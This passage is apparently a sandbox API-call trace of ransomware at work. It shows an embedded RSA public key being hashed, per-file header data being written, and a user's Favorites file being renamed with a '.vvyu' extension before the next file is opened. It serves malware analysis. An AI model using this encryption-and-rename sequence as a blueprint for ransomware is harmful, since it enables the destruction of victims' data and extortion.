KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0197.247] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.247] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.247] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0197.248] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0197.248] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.249] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0197.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0197.249] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0197.249] GetLastError () returned 0x0 [0197.249] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0197.249] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0197.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0197.249] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0197.249] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0197.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0197.249] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0197.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0197.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0197.250] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0197.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0197.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0197.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0197.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0197.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95068 [0197.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f48 [0197.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95020 [0197.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f60 [0197.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f90 [0197.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ff0 [0197.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fa8 [0197.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0197.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0197.251] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0197.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0197.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0197.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0197.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0197.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0197.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ff0 [0197.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0197.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fa8 [0197.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0197.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2f90 [0197.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0197.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0197.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0197.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0197.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0197.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0197.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0197.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0197.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0197.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0197.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0197.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0197.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0197.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0197.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0197.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0197.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0197.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0197.254] GetCurrentThreadId () returned 0x66c [0197.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0197.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea59b0 [0197.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9680 [0197.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0197.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0197.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0197.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0197.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0197.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.255] GetCurrentThreadId () returned 0x66c [0197.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0197.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0197.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ff0 [0197.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f90 [0197.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0197.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0197.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0197.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fa8 [0197.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0197.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0197.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0197.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f78 [0197.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0197.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3008 [0197.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0197.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0197.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0197.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fd8 [0197.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0197.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fc0 [0197.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0197.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3020 [0197.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0197.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fc0 [0197.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0197.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0197.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0197.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0197.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0197.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0197.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0197.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f90 [0197.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0197.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0197.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0197.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0197.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0197.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0197.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0197.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0197.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0197.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0197.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0197.258] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0197.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0197.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0197.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0197.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0197.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0197.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0197.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0197.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0197.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0197.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0197.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0197.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0197.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0197.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0197.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0197.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0197.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0197.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0197.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0197.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0197.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0197.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95020 | out: hHeap=0x620000) returned 1 [0197.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0197.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0197.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0197.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0197.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0197.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0197.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0197.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0197.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0197.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0197.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0197.265] WriteFile (in: hFile=0x568, lpBuffer=0x2e915e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e915e0*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0197.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0197.266] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.266] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0197.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0197.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0197.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0197.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0197.267] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0197.267] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.267] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.268] CloseHandle (hObject=0x568) returned 1 [0197.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0197.269] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0197.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0197.269] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Work.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at work.url.vvyu")) returned 1 [0197.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.332] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0197.348] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0197.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6ead8 [0197.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.429] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned=".url" [0197.445] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 